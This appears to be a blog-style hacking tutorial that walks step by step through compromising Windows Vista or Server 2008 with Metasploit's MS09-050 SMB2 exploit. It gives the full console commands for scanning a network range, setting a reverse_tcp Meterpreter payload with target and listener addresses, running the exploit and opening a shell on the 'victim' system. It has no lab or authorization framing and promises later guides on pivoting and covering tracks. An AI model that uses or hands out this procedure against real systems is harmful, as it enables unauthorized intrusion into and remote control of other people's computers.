How to Hack Like a Pro: Hacking Windows Vista by Exploiting SMB2 Vulnerabilities
Hi, gang! Time for another hack using Metasploit.
We have exploited Windows XP (a very insecure operating system) and we have exploited Ubuntu and installed Meterpreter on a Linux system exploiting the Samba service. Several of you have asked for a hack on more modern Windows systems, so here goes.
In this module, we hack into Windows Vista or Windows Server 2008 using a vulnerability found in SMB2. As you know, SMB2 is an application level protocol used to share files, folders and printers on Windows systems. SMB2 is the revised version of Microsoft's SMB that was introduced in 2006 and is used in Windows Vista and Windows Server 2008 (SMB and SMB2 have been plagued with security vulnerabilities from the very beginning).
So… let's get started. Boot up your Linux operating system, open a terminal, and load the Metasploit Framework.
Before we begin to exploit, we need to scan the network to find the SMB identifiers for the systems we want to hack. Metasploit has multiple auxiliary modules that can help us with many of the preliminary tasks of hacking, such as scanning our victim network to obtain necessary information. In this case, we will use the auxiliary module scanner/smb/smb_version to scan the network.
msf > use scanner/smb/smb_version
Next, we need to see our options.
msf auxiliary(smb_version) > show options
Notice from the screen capture that Metasploit displays our options for this auxiliary module.
Note here that we need to set our RHOSTS and THREADS. We set our RHOSTS to our targeted address range, in this case 192.168.1.0 through 192.168.1.255 (yours may be different depending upon your network).
msf auxiliary(smb_version) > set RHOSTS 192.168.1.0-192.168.1.255
RHOSTS => 192.168.1.0- 192.168.1.255
We then set the number of concurrent threads to 50.
msf auxiliary(smb_version) > set THREADS 50
THREADS => 50
By typing show options again, we can see that Metasploit has set our options as we have defined them.
msf auxiliary(smb_version) > show options
If we have done everything correctly, Metasploit will show that we have set our options properly.
Next, we need to run our SMB scan on the network.
msf auxiliary(smb_version) > run
We can see that this scan returns results on all the machines on the defined network giving us critical information on the operating system version, the service pack, and the computer name. In my screenshot example, I have just one computer on the network and the scan correctly identifies the operating system, the service pack, and the computer name.
Now that we know there are systems available that are using SMB, we can load the appropriate module in Metasploit, in this case ms09_050_smb2_negotiate_func_index.
msf auxiliary(smb_version) > use windows/smb/ms09_050_smb2_negotiate_func_index
To learn more about this exploit module, we can simply type info.
msf exploit(ms09050_smb2_negotiate_func_index) > info
As you can see in the screenshot above, Metasploit provides us critical background information on this exploit.
Now we set our payload to the Windows.
msf exploit(ms09_050_smb2_negotiate_func_index) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
We then need to set the RHOST...
msf exploit(ms09050_smb2_negotiate_func_index) > set RHOST 192.168.1.100
RHOST => 192.168.1.100
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST 192.168.1.111
LHOST => 192.168.1.111
We need to check to make certain our options are set properly by typing show options.
msf exploit(ms09_050_smb2_negotiate_func_index) > show options
Finally, we exploit SMB2 on the Vista system.
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit
The Vista system then returns a Meterpreter prompt and we type sysinfo.
meterpreter > sysinfo
OS : Windows Vista (Build 6001, Service Pack 1).
Arch : x86
We then type shell to get a shell on our victim system.
meterpreter > shell
You have now successfully hacked the Windows Vista box. If this hack doesn't work the first time, try again. Hacking is often a matter of probabilities and all hacks don't work all the time.
Look for future how-to articles on using the Meterpreter to control the owned box, using it to pivot attacks from, and cover your tracks.